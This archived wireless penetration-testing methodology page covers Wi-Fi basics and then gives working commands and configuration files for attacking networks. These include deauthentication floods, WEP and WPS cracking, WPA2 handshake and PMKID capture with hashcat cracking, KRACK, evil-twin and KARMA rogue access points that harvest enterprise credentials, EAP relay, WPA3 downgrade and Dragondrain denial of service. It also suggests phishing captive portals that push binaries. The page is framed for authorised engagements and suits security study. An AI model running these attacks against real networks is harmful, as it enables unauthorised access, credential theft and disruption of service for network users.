Wireless PenTest Methodologies
📡

Wireless PenTest Methodologies

📅 [ Archival Date ]
Oct 20, 2022 5:37 PM
🏷️ [ Tags ]
WirelessProximityTactical
✍️ [ Author ]
Clément Cruchet

WLAN basics

Frequency / bands / Channels

  • 2.4 GHz : 11 Channels (14 total, e.g: In Japan)
    • 2.4 GHz = 802.11 b / g / n / ax
  • 5 GHz : 45 Channels
    • 5 GHz = 802.11 a / h / j / n / ac / ax
image

Overlapping channels for 2.4 GHz

image

Non Overlapping channels for 2.4 GHz (to avoid interferences) with channel bonding

image

Signal and attenuation 2.4GHz VS 5GHz

image
  • -> The higher the frequency of a wireless signal the shorter the range. --> 2.4GHz (802.11g) covers a substantial larger range than that of 5.0GHz (802.11a) --> The higher frequency signals of 5.0GHz do not penetrate solid objects nearly as well as do 2.4GHz signals. --> The smaller wavelength of 5.0GHz allows a higher absorption rate by solid objects
image

Antennas

image

Frames

Management Frames

WireShark filter: (wlan.fc.type == 0)&&(wlan.fc.type_subtype == 0x0c)

image
  • Beacon Frame: It contains all the information about the network. Beacon frames are transmitted periodically, they serve to announce the presence of a wireless LAN and to synchronise the members of the service set. Beacon frames are transmitted by the access point (AP) in an infrastructure basic service set (BSS).
image
  • Probe Request / Response: Client looking for specific SSID or wildcard SSID which means any SSID available. Probe Requests are send by the client on broadcast.
image

Control Frames

Data Frames

Authentication Types

Open Authentication

  • Open
  • OWE

Personal Authentication

  • WEP
  • WPA/WPA2-PSK
  • WPA3-SAE

Enterprise Authentication

  • WPA/WPA2/WPA3-EAP
    • Methods:
      1. EAP-GTC
      2. EAP-MD5
      3. EAP-PAP
      4. EAP-CHAP
      5. EAP-MSCHAP
      6. EAP-MSCHAPv2
      7. EAP-TLS
      8. EAP-AKA
      9. EAP-PWD
      10. EAP-SIM
      11. EAP-NOOB

Installation / Configuration

It is highly recommanded to use a Kali Linux OS with bare metal install regarding dependencies and current research on WPA3 or tool for WPA2-Enterprise.

Install the driver for ALPHA card. https://github.com/aircrack-ng/rtl8812au

Debug and Wi-Fi ninja

Check Wi-Fi card frequency and channel available

┌──(lutzenfried㉿xec)-[~/]
└─$ iwlist wlan1 channel
wlan1 32 channels in total; available frequencies :
 Channel 01 : 2.412 GHz
 Channel 02 : 2.417 GHz
 Channel 03 : 2.422 GHz
 Channel 04 : 2.427 GHz
 Channel 05 : 2.432 GHz
 Channel 06 : 2.437 GHz
 Channel 07 : 2.442 GHz
 Channel 08 : 2.447 GHz
 Channel 09 : 2.452 GHz
 Channel 10 : 2.457 GHz
 Channel 11 : 2.462 GHz
 Channel 12 : 2.467 GHz
 Channel 13 : 2.472 GHz
 Channel 36 : 5.18 GHz
 Channel 40 : 5.2 GHz
 Channel 44 : 5.22 GHz
 Channel 48 : 5.24 GHz
 Channel 52 : 5.26 GHz
 Channel 56 : 5.28 GHz
 Channel 60 : 5.3 GHz
 Channel 64 : 5.32 GHz
 Channel 100 : 5.5 GHz
 Channel 104 : 5.52 GHz
 Channel 108 : 5.54 GHz
 Channel 112 : 5.56 GHz
 Channel 116 : 5.58 GHz
 Channel 120 : 5.6 GHz
 Channel 124 : 5.62 GHz
 Channel 128 : 5.64 GHz
 Channel 132 : 5.66 GHz
 Channel 136 : 5.68 GHz
 Channel 140 : 5.7 GHz
 Current Frequency:2.412 GHz (Channel 1)

Restart networking service and WPA supplicant

sudo service networking restart
sudo systemctl restart networking.service
sudo systemctl restart wpa_supplicant.service

Changing Wi-Fi card channel

sudo ifconfig wlan1 down
sudo iwconfig wlan1 channel 64
sudo ifconfig wlan1 up

Changing Wi-Fi card Frequency

sudo ifconfig wlan1 down
sudo iwconfig wlan1 freq "5.52G"
sudo ifconfig wlan1 up

Monitor mode

airmon-ng start wlan0
ifconfig wlan0 down
iw dev wlan0 set monitor none
ifconfig wlan0 up

Connect using wpa-supplicant

wpa_supplicant -D nl80211 -i wlan1 -c psk.conf

psk.conf

network={
 ssid="CompanyWiFi"
 psk="SuperPassword"
 proto=RSN
 key_mgmt=WPA-PSK
 pairwise=CCMP TKIP
 group=CCMP TKIP
}
image

Recon

sudo airodump-ng -i wlan0 -w reconfile --output-format csv
  • -> Within airodump-ng you can press "a" key to display ap only / sta only / ap + sta

Scan 5Ghz using a band

sudo airodump-ng --band a -i wlan1

Hidden SSID

With Connected Clients

  1. Run airodump-ng on the same channel as of SSID
sudo airodump-ng wlan1 -c 11
  1. Send deauth packets to clients
  2. Client will send probe requests and AP will respond with probe response disclosing the SSID name

Without Connected Clients

  1. Run dictionary attack
  2. Popular SSID dictionary from internet or create one
  3. Run automated script to try to connect to each SSID

Passive Sniffing

  • Wireless interface into monitor mode (airmon-ng, iw utility) --> Wireless card can only be on 1 channel at a time.

Tools: Wireshark, tshark, termshark, tcpdump, airodump-ng, horst

Preferred Network List (PNL)

The PNL or Preferred Network List is a list of Wi-Fi network names (SSIDs) your device automatically trusts. (PNL is generated from the networks you have connected to over time)

  1. Sniff the PNL through probe request emitted by STA (Station/client)
  2. Create fake access point with same SSID (Wi-Fi routeur, HostAPD, WiFiPhisher, BetterCap, EAPHammer, airbase-ng, nodogsplash)
  3. Redirect the connected STA to phishing page / Attack the client (windows client)

Hostapd config file for open authentication Wi-Fi network

image
interface=wlan1
driver=nl80211
ssid=GuestCorpWifi
bssid=A5:C4:0D:6A:75:3A
channel=6

Hostapd config file for WPA2-PSK authentication

interface=wlan1
driver=nl80211
ssid=dex-net
wpa=2
wpa_passphrase=password
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
channel=1

bss=wlan1_0
ssid=dex-network
wpa=2
wpa_passphrase=Password1
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
channel=1

Launch fake open authentication Wi-Fi network

hostapd open.conf

Open Network

Beacon flood attack

Beacon flood attack is more a nuisance attack linked to 802.11 protocol weaknesses.

You can randomly create SSID or give specific wordlist for SSID names.

mdk4 wlan1 b -a -g -f ssid_names.txt
image

Deauthentication attack

Deauthentication attack is possible because within WPA2 (PSK and Enterprise (MGT)) the management frames are not protected. Its also more of a nuisance attack but can be usefull (comparing to beacon flood) to deauthenticate an STA (station/client) to intercept WPA2-handshake or redirect STA (station/client) to authenticate against your fake Radius server (WPA2-Enterprise).

  • -> Deauthentication can also be usefull when bypassing Captive Portal, to force client to reconnect and get their MAC address.

Deauth using aireplay-ng (-c : client is optional)

aireplay-ng -0 100 -a BSSID -c STA/CLIENT wlan1

WPS Pin

Checking within a capture the WLAN with WPS enable

wps.wifi_protected_setup_state==2

Install reaver

sudo apt install reaver

Identify device using WPS

sudo wash -i wlx00c0ca996340

Attacking specific BSSID

sudo reaver -i wlx00c0ca996340 -c 1 -b C0:3C:04:02:16:48 -vv

Guest Network

Guest network without password

MAC based restriction or captive portal are bypassable security solution but providing Guest network without password can be worst.

  1. Verify the client connected within the guest network can see each other ()
  2. Verify Guest network isolation with corporate Wi-Fi, or protected Wi-Fi (WPA/WPA2-PSK/WPA3/WPA2-Enterprise)
  3. Verify Guest network isolation with internal corporate network IP range
  4. Check if the public source IP from Guest network is the same as from internal corporate or corporate Wi-Fi with authentication
  5. Check default creds on network components
  6. Check for vulnerabilities (RCE,...) on network components
  • -> If client isolation is not in place, check to password spray on Windows hosts or attack them (MS17-010, EternalBlue...)

MAC based authentication (Captive Portal Bypass)

  1. You first need to authenticate on the Open Wifi. You will then be redirected to the captive portal.
  2. At this time you will need to find a connected STA/Client (you can send deauth to a BSSID hosting the open network to increase the chance of getting a valid MAC address from connected STA/Client)
  3. MAC change you wlan interface MAC address
ifconfig wlan1 down
macchanger -m D2:E9:6A:D3:B3:51 wlan1
ifconfig wlan1 up

DNS Tunneling

Network Isolation

  • Validate the network isolation/segmentation between guest wi-fi, captive portal based authentication wi-fi and internal corporate network or Wi-Fi corporate network.

Client isolation/separation

  • Validate the isolation between clients connected on the Open Network.

Azure AD and conditional Access Policy

Sometimes it is possible to bypass conditonal access policy for example regarding MFA which can be based on Source IP Adress or Geolocation from the Guest Network.

This represents a vulnerability and could give to an attacker the ability to get a first foothold.

Guest Public IP VS Corporate Public IP

It is important to have a different exit public IP address for any guest regarding the internal network IP.

  • -> Validate the public IP address from any guest network and internal network is different.

Fake access point with internet access

WEP

  • Wired Equivalent Privacy
  • Uses Rivest Cipher 4 (RC4) Stream cipher
  • 40 Bit or 104 Bit shared key + 24 Bit IV concatenated to the Shared Key --> 64 or 128 Bit encryption key
image
image

Connecting using wpa_supplicant

wpa_supplicant -i wlan0 -c wep.conf
wpa_supplicant -B -i wlan0 -c wep.conf

wep.conf

network={
 scan_ssid=1
 ssid="WepCorpo"
 key_mgmt=NONE
 wep_key0="Password123"
 wp_tx_keyidx=0
}

Cracking WEP

  • 250,000 IVs for cracking 64 bit WEP Key
  • 1,500,000 IVs for cracking 128-bit WEP Key
  • -> You can do passive IV capture (but it will take time) OR --> Inject traffic to force more packets and more IVs (Replay Attack)
  • Capture ARP packet and send to AP, it will send reply.
sudo airodump-ng -i wlan1 --bssid 14:D6:4D:26:73:96 -w wep
sudo aireplay-ng -3 -b 14:D6:4D:26:73:96 -h 66:B9:B8:1D:EC:66 wlan1
sudo aircrack-ng wep-01.ivs
image

Decrypt traffic

Once the key is retrieve attacker can decrypt traffic for other devices.

  • WireShark (GUI)
  • Airdecap-ng (CLI)

WEP Cracking alternative

In case you don't have enought IVs to recover the key you can use dictionnary attack.

Validate the current capture file

airodump-ng -r WEP-capture.cap

Creating the the hex wordlist from the password wordlist or use this python script

for i in $(cat 1000000-password-seclists.txt); do echo $i | od -A n -t x1 | sed 's/ *//g'; done >> hex_wordlist.txt
python3 crack.py 1000000-password-seclists.txt WEP-Advanced.cap 00:21:91:D2:8E:25

Recover and decrypt traffic using hex(password) dictionnary and airdecap-ng

for hex in $(cat hex_wordlist.txt); do airdecap-ng -w $hex WEP-capture.cap; done

WPA / WPA2

  • WPA TKIP (Based on WEP) - Intermediate solution by Wi-Fi Alliance / Hardware change not required
  • WPA2 CCMP (Based on AES)

TKIP - Temporary Key Integrity Protocol

4 way handhsake and encryption keys

  • PassPhrase (password)
  • PSK (Pre shared key)
  • PMK (Pairwise Master Key)
  • PTK (Pairwise Transient Key)
  • GTK (Group Temporal Key)
  • GMK (Group Master Key)
  • -> In PSK authentication, the PMK is the same thing as PSK. PMK=PSK.

WPA/WPA2 use PBKDF2 (Password Based Key Derivation Function).

PMK/PSK = PBKDF2(PassPhrase, SSID, ssidLen, 4096, 256) --> 4096 = Number of iterations or times the passphrase is hashed --> 256 = Intended Key Length of PSK in bits

PTK = PRF(PMK, ANonce, SNonce, Authenticator MAC, Supplicant MAC)

  • PMK - Pairwise Master Key
  • ANonce - Random string generated by Access Point (AP)
  • SNonce - Random string generated by client/station (STA)
  • Authentication MAC - Access Point MAC
  • Supplicant MAC - Client/station MAC
  • -> PRF is a pseudo-random function which is applied to all the input --> PTK is separate for every user

GTK = Generated by Access Point and sent to client.

  • Same for all clients Connected to a BSSID
  • USed for broadcast, multicast messages
image
image
image

WPA2-PSK

One of the most known technic to attack WPA2-PSK (Pre Shared Key) is to deauthenticate clients and capture authentication handshake to further brute force it and try to recover clear text password.

image

WPA2-Deauthentication attack (against client)

sudo aireplay-ng --deauth 10 -a <BSSID> -c <CLIENT_MAC> wlan1
sudo aireplay-ng --deauth 10 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D wlan1

WPA2-Deauthentication attack (against AP)

If the –c (CLIENT_MAC) parameter is not specified when you run your deauth attack with aireplay-ng, all clients connected to the AP will be disconnected via deauthentication broadcast packet, but it is more effective to target a client individually.

sudo aireplay-ng --deauth 10 -a <BSSID> wlan1
sudo aireplay-ng --deauth 10 -a 00:14:6C:7E:40:80 wlan1

#####Capture WPA2 Handshake In order to attack and crack WPA2 handshake you do not need to get full 4 way handshake. (Filter in Wireshark: eapol) --> Airodump-ng will inform you when you capture a valid handshake.

You will need the minimal following packets/message from 4 way handshake:

  • ANonce (Message 1 and Message 3)
  • SNonce (Message 2)
  1. Packet 1 and 2
  2. Packet 2 and 3
sudo airodump-ng wlan1 -c 11 --bssid 00:1C:10:00:00:00 -w ./capturePSK

Cracking WPA2 handshake

Dictionnary attack

Converting .CAP capture with handshake to hccapx hashcat format

sudo apt install git gcc
git clone https://github.com/hashcat/hashcat-utils.git
cd hashcat-utils/src/
gcc cap2hccapx.c -o cap2hccapx.bin
./cap2hccapx.bin wpa_handshake.cap handshake.hccapx

Dictionnary attack using hashcat

hashcat.exe -m 22000 handshake.hccapx wordlists/rockyou.txt

Pre Computed PMK

Pre computed PMK (Because PBKDF2 function is time consuming to proceed). You will still need to capture 4 Way handshake for SNonce, ANonce, AP MAC and Client MAC.

  • Require SSID and Passphrase (dictionnary)
genpmk -f wordlistPassphrase.txt -s CorpoWifi -d precomputed_PMK
cowpatty -d precomputed_PMK -s CorpoWifi -f wordlistPassphrase.txt
image

WPA2 App Less Attack

You will need to have a probing client within the vicinity or range, create a fake access point, wait the client for connect and capture the 4-way handshake.

hostapd wpa-psk.conf

wpa1-psk.conf

interface=wlan1
driver=nl80211
ssid=CorpoWifi
bssid=00:1C:10:00:00:00
wpa=2
wpa_passphrase=wedontcare
wpa_key_mgmt=WPA-PSK
rsn_pairwise=TKIP
channel=1

wpa2-psk.conf

interface=wlan1
driver=nl80211
ssid=CorpoWifi
bssid=00:1C:10:00:00:00
wpa=2
wpa_passphrase=wedontcare
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
channel=1

KARMA Attack

Attacker will look for client probe requests and immediately change the SSID it is broadcasting to match the probe request of the client. Responding to everyone.

karma.conf

interface=wlan1
ssid=nothing
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=/root/certs/hostapd.eap_user
ca_cert=/root/certs/server.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
enable_mana=1

PMKID Attack

Traditional handshake capture and brute force methods wait for client to de-authenticate and re-authenticate while PMKID attack doesn’t. Direct PMKID is captured in this attack and then cracked.

Many routers cache PMKID of exchange process in a collection of information PMKSA, so that the next time client de and re-authenticates 4-way handshake won’t be done again and router would directly ask the client for PMKSA, verify it and he would be re-associate it back with an access point.

PMKID is a field in the RSN IE frame (Robust Security Network Information Element). RSN IE is an optional frame found in routers.

apt install hcxtools
hcxdumptool -o PMKID_results -i wlan0mon
hcxpcaptool -z hashPMKID PMKID_results

Cracking PMKID hashes using hashcat (newer version of hashcat -m 22000)

hashcat -a 0 -m 16800 pmkid.txt ../../wordlists/wordlistsOnex/

Key Reinstallation Attack (KRACK)

Toolset:

When client joins a network it executes the 4-way handshake to negotiate a fresh encryption key (PTK). --> The key will be install after receiving the message 3 of the *4-way handshake. --> In case message 3 is lost or dropped, the Access Point will retransmit message 3 if it did not receive an appropriate response as aknowledgment --> As a result client may receive message 3 multiple time, each time it will reinstall the same encryption key and reset the incremental transmit packet number (nonce)

sudo ./krack-all-zero-tk.py wlan0 wlan1 CorpoWPA2 --target 00:1C:10:00:00:00

FRAG Attack

WPA2 Enterprise

image

wpa_supplicant and EAP

Authenticate to WPA EAP network using wpa_supplicant

wpa_supplicant -i wlan0 -c ./wpa_supplicant.conf

wpa_supplicant.conf

network={
 ssid="YOUR_SSID"
 scan_ssid=1
 key_mgmt=WPA-EAP
 identity="YOUR_USERNAME"
 password="YOUR_PASSWORD"
 eap=PEAP
 phase1="peaplabel=0"
 phase2="auth=MSCHAPV2"
}

EAP Types

EAP is an authentication framework that defines the transport and usage of identity credentials. EAP encapsulates the usernames, passwords, certificates, tokens, OTPs, etc. that a client is sending for purposes of authentication.

image

EAP-MD5

  • Non tunnel EAP method
  1. Radius send 16 bytes MD5 Challenge
  2. Client send MD5 hash of
    1. Responde ID
    2. Password
    3. Challenge
  • -> Attacker can eavesdrop and sniff MD5 challenge. (vulnerable to dictionnary attack) --> No mutual authentication: Server is validating the client, but the client does not authenticate the Server (i.e.: does not check to see if it should trust the server).
  • https://github.com/joswr1ght/eapmd5pass
./eapmd5pass -w dict -r eapmd5-sample.dump
image

EAP-PAP

EAP-GTC - Generic Token Card

  • Non tunnel EAP method EAP method created by cisco. --> EAP-GTC carries a text challenge from the authentication server and a reply generated by a security token. Exchange of clear-text authentication credentials across the network. EAP-GTC method is intended to be used with Token Cards supporting challenge/response verification.

EAP-CHAP - Challenge Handshake Authentication Protocol

3 way handshake process:

  1. The authentication server issues a challenge (Nonce)
  2. The users's device sends the hashed Nonce with the user password
  3. The authentication server evaluate the hashed Nonce

EAP-AKA

  • Non tunnel EAP method EAP Authentication and Key Agreement. (RFC 4187)

EAP-MSCHAPv2 - Microsoft Challenge Authentication Protocol version 2

  • Non tunnel EAP method

Same as CHAP but Microsoft Proprietary system.

image

EAP-PWD

  • Non tunnel EAP method EAP Password, EAP method which uses a shared password for authentication.
image

EAP-NOOB

Nimble out-of-band authentication for EAP, generic bootstrapping solution for devices which have no pre-configured authentication credentials and which are not yet registered on any server. (IoT, Gadgets, Toys).

Authentication for this EAP method is based on a user-assisted out-of-band (OOB) channel between the server and peer.

LEAP - Light Weight EAP

Cisco proprietary EAP method based on modified version of MSCHAP. User credentials not strongly protected.

    1. Tool: asleap

    2. STA requests authentication with 802.1X start message
    3. AP issues a random 8-byte challenge
    4. STA encrypts the 8-byte challenge 3 times, using the NT hash of their password as seed material. The STA then joins the 3 DES outputs as a single 24-byte response.
    5. AP issues a success or failure message.
    6. STA issues a 8-byte challenge.
    7. AP responds with a 24-byte response.
    8. STA is able to send data to the distribution system

EAP-FAST - Flexible Authentication by Secure Tunneling

  • Non tunnel EAP method

Instead of using a certificate to achieve mutual authentication. EAP-FAST authenticates by means of a PAC (Protected Access Credential) which can be managed dynamically by the authentication server. The PAC can be provisioned (distributed one time) to the client either manually or automatically.

Manual provisioning is delivery to the client via disk or a secured network distribution method. Automatic provisioning is an in-band, over the air, distribution.

EAP Encapsulation (Tunnel)

Hide sensitive/vulnerable part.

EAP-PEAP

PEAP - Protected EAP.

EAP-TLS - Transport Layer Security

EAP-TLS is still considered one of the most secure EAP standards available. --> EAP-TLS require mutual authentication using client-side X.509 certificates.

image

EAP-TTLS - Tunneled TLS

EAP-Tunneled Transport Layer Security. Very Similar to EAP-PEAP. (But as option to use client side certificate)

  1. Server authenticates with certificate
  2. Client can optionally use Certificate as well

Inner authentication:

  • PAP
  • CHAP
  • MSCHAP
  • MSCHAPV2

Identity Privacy misconfiguration

  • Absence of Identity Privacy During 802.1x EAP negotiations, client send its identity to the authenticator before engaging in the RADIUS authentication process. --> EAPOL frames within the first authentication phase are not encrypted --> An attacker can see the AD usernames in plaintext

WPA2-EAP - Password spray attack

WPA2-EAP Evil Twin Attack

Hostapd-WPE (Previously FreeRadius WPE)

Support the following EAP types for impersonation:

  • EAP-FAST/MSCHAPv2 (Phase 0)
  • PEAP/MSCHAPv2
  • EAP-TTLS/MSCHAPv2
  • EAP-TTLS/MSCHAP
  • EAP-TTLS/CHAP
  • EAP-TTLS/PAP
apt install hostadp-wpe
ifconfig wlan1 down
hostapd-wpe ./evilhostapd.conf

username: jdoe
 challenge: bc:87:6c:48:37:d3:92:6e
 response: 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0

evilhostapd.conf configuration file

interface=wlan1
ssid=EvilCorp
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=/root/certs/hostapd.eap_user
ca_cert=/root/certs/server.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1

hostapd.eap.user

* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]

Cracking the NetNTLM challenge using asleap or hashcat.

asleap -C bc:87:6c:48:37:d3:92:6e -R 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0 -W wordlist
./hashcat64.bin -a 0 -m 5500 hash.txt dictionary.txt -r rule.txt

Eaphammer

Create an identical fake certificate for authentication server.

./eaphammer --cert-wizard

Execute evil twin attack on channel 4 against CORPOWIFI SSID

./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CORPOWIFI --creds
/eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CORPOWIFI --creds --negotiate weakest

Cracking the NetNTLM challenge using asleap

asleap -C 06:9b:40:83:37:90:fd:41 -R 27:63:33:83:e7:25:98:5e:6d:4f:ed:73:b9:c5:1a:cc:91:13:bc:f9:13:95:30:56 -W ../wordlists/100-common-passwords.txt

WPA2-EAP Relay

  1. Mana will pretend to be corporate AP
  2. Supplicant (wpa_sycophant) retrieving the required information from mana to connect to the legitimate corporate AP.
image

This attack can fail if :

  • User doesn't accept the rogue certificate
  • Cryptographic binding (cryptobinding)
    • When cryptobinding is enabled it creates a connection between the two tunnels to ensure that the client that is authenticating against the RADIUS server is the same client that created the initial TLS tunnel to the access point.

Running hostapd-mana

hostapd-mana hostapd.conf | grep 'SYCOPHANT\|MANA'

hostapd.conf file

interface=wlan0
ssid=CorpoSSID
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=/root/certs/hostapd.eap_user
ca_cert=/root/certs/server.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
enable_mana=1
enable_sycophant=1
sycophant_dir=/tmp/

Launching wpa_sycophant

./wpa_sycophant.sh -c wpa_sycophant.conf -i wlan1

wpa_sycophant.conf (bssid_blacklist = MAC of your fake hostapd AP)

network={
 ssid="TestingEAP"
 # The SSID you would like to relay and authenticate against.
 scan_ssid=1
 key_mgmt=WPA-EAP
 # Do not modify
 identity=""
 anonymous_identity=""
 password=""
 # This initialises the variables for me.
 # -------------
 eap=PEAP
 # Read https://w1.fi/cgit/hostap/plain/wpa_supplicant/wpa_supplicant.conf for help with phase1 options.
 # This attempts to force the client not use cryptobinding.
 phase1="crypto_binding=0 peapver=0"
 phase2="auth=MSCHAPV2"
 # Dont want to connect back to ourselves,
 # so add your rogue BSSID here.
 bssid_blacklist=00:14:22:01:23:45
}

WPA3

The major improvement of WPA3 is a improved handshake (Dragonfly-Handshake) that makes it impossible for attackers to record the 4-Way Handshake and launch a offline dictionary attack.

The Dragonfly variant used in WPA3 is also known as Simultaneous Authentication of Equals (SAE).

WPA3 improvments:

  • Provide mutual authentication
  • Negotiate Session Key
  • Prevent Offline Dictionary Attacks
  • Perfect forward secrecy

WPA3 also introduces perfect forward secrecy which prevents attackers from decrypting past traffic after a key breach.

Additionally, WPA3 supports Protected Management Frames (PMF) which makes it impossible to launch de-authentication attacks. ---> WPA2 already supports this, therefore this is not a novelty of WPA3. However with WPA, PMF are included from the start in the certification program.

image

OWE : Opportunistic Wireless Encryption

OWE authentication makes Wi-Fi network access as convenient as that in open authentication mode, allowing users to access the Wi-Fi network without entering the password. In OWE authentication mode, a STA and an AP perform a Diffie-Hellman key exchange to encrypt data transmitted between the STA and Wi-Fi network, thereby protecting user data security.

image

ZKP - Zero Knowledge Proof

Within WPA3 the important improvment come from the new handshake which does not transmit any secrets or credentials.

A zero knowledge proof is a cartographic protocol that enables one party to to prove to another party that they know a value x without conveying any information other than the fact that they know the value of x.

WPA3 makes use of such a zero knowledge proof to ensure that no secrets of the passwords are transmitted in the SAE handshake. The SAE handshake is the first handshake realized before classical 4 way handshake such as in WPA2.

SAE handshake goal is to make sure both handshake participants can be sure that the other party knows that they possess the same and correct password. --> Mutual authentication (both parties prove that they have knowledge over the same password.)

Use WPA3-SAE authentication on Linux

WPA3-SAE

SAE : Simultaneous Authentication of Equals (SAE)

image

Before executing the DragonFly handshake, the password which may be stored in ascii or unicode needs to be converted in group Element P. This group Element P will be used within the cryptographic calculation of the handshake.

  • P = Password element (PWE)
  • P = Hash(pw, STA, AP, counter)
image

Then the Commit phase can occur, this phase will be in charge of negotiating the shared key between Client and Access Point.

image

Then a last step is realized confirm phase to validate both peers negotiate the same key which also proof they both posses the password.

image

Dragonslayer: Implements attacks against EAP-pwd.

Dragondrain: This tool can be used to test to which extent an Access Point is vulnerable to Denial-of-Service attacks against WPA3’s SAE handshake.

Dragontime: This is an experimental tool to perform timing attacks against the SAE handshake if MODP group 22, 23, or 24 is used. Note that most WPA3 implementations by default, do not enable these groups.

Dragonforce: This is an experimental tool which makes the information recover from our timing or cache-based attacks, and performs a password partitioning attack. This is similar to a dictionary attack.

Attacking WPA3

WPA3-Transition Downgrade Attack

Allow non WPA3-SAE compliant device to connect using WPA2-PSK. --> Issue: WPA2 clients and WPA3 clients will use the same secret passphrase.

2 techniques can be used:

  1. Capture WPA2-PSK handshake of connecting client and crack the handshake
  2. In case no clients use WPA2-PSK you can try to create fake WPA2-PSK and wait for client to connect, capture and crack WPA2 handshake
  • Same SSID
  • Same channel

Steps:

  1. Identify WPA3 transition network
  • Check RSN element of beacon frame for both PSK and SAE presence
  1. Create a WPA2-PSK network (any random wrong passphrase)
  2. If PMF is enabled wait for the client (if not deauth the client) to make mistake, capture 4-way handshake and run dictionary attack
image

Below is the PMF related beacon, PMF is set as required and capable, so the bits are set to 1.

image

Defense: Disable WPA3 transition mode and go for 2 separate networks with separate passphrase.

Security Group Downgrade Attack

Force a client to use a weak security group.

Steps:

  1. Host a WPA3 honeypot and wait for client to connect
  2. When client connects, reject the commit message till the time client doesn't use the weak group
  3. Once the client connects, capture the dragonfly handshake and crack it
  • -> Not working if weak security groups are not supported by the device.

Defense:

WPA3-SAE timing or cache password paritioning

Timing attack using weak group

Timing attacks against the SAE handshake if MODP group 22, 23, or 24 is used. Note that most WPA3 implementations by default do not enable these groups.

./dragontime -d wlan0 -c 1 -a 11:22:33:44:55:66 -g 27 -i 250 -t 750 -o measurements.txt

Denial of Service against WPA3-SAE

Test to which extend an Access Point is vulnerable to denial-of-service attacks against WPA3's SAE handshake. The Dragondrain tool forges Commit messages to cause a high CPU usage on the target.

./dragondrain -d wlan0 -a 01:02:03:04:05:06

WPA3-EAP - Invalid curve attack

dragonslayer/client.conf

network={
 ssid="WPA3Corpo"
 identity="jdoe"

 key_mgmt=WPA-EAP
 eap=PWD
 password="unknown password"
}
sudo ./dragonslayer-client.sh -i wlp2s0 -a 1

WPA3-EAP - Reflection attack

sudo ./dragonslayer-client.sh -i wlp2s0 -a 0

Wi-Fi Hacking Mind Map

image

Other Attacks

Fake Captive Portal

  • Asking connected client for AD or any sensitive credentials
  • You could also redirect the user to download some binary

Fake Open Access Point

The main goal is to create an interesting enough SSID in order for a victim to connect (e.g. SSID: Company-FreeSnacks).

  • Monitor connection from clients
  • Directly attacked clients
  • MITM their traffic

To be checked - Validated during an engagement

General

  • Check for the presence of rogue or undocumented Access Point

Open Authentication

  • Captive portal bypass
  • DNS tunneling
  • Passive Sniffing
  • Evil Twin (MITM, Captive Portal (phishing), Hostile portal attack, OWE Transition downgrade)
  • Client isolation
  • Network segmentation
  • AD Authentication on Guest Portal
  • Self-Signed Certificate on Guest Portal
  • Azure AD Conditional Access Policy
  • Active Directory Authentication on Guest Portal

Personal Authentication

  • WEP attacks
  • WPS Pin attacks
  • PMKID attack
  • 4 way handshake sniffing
  • Deauthentication attack
  • KRACK Attack
  • FRAG Attack
  • WPA3-Transition Downgrade attack
  • WPA3-SAE timing or cache based password partitioning attacks

Enterprise

  • Evil twin attack / Fake AP
  • Password Spray
  • Absence of Identity Privacy

Resources

WPA3 - DragonFly

Dragonblood: Analyzing the Dragonfly Handshake of WPA3 and EAP-pwd

WEP Cloaking

4-Way Handshake

PTK Derivation

Pi-PwnBox Rogue AP

OpenWRT supported devices

OpenWRT Compatibles routers

SSID Oracle Attack on Undisclosed Wi-Fi Preferred Network Lists

WEP attack fragmentation - chopchop

Tools

Defenses

KARMA Attack detection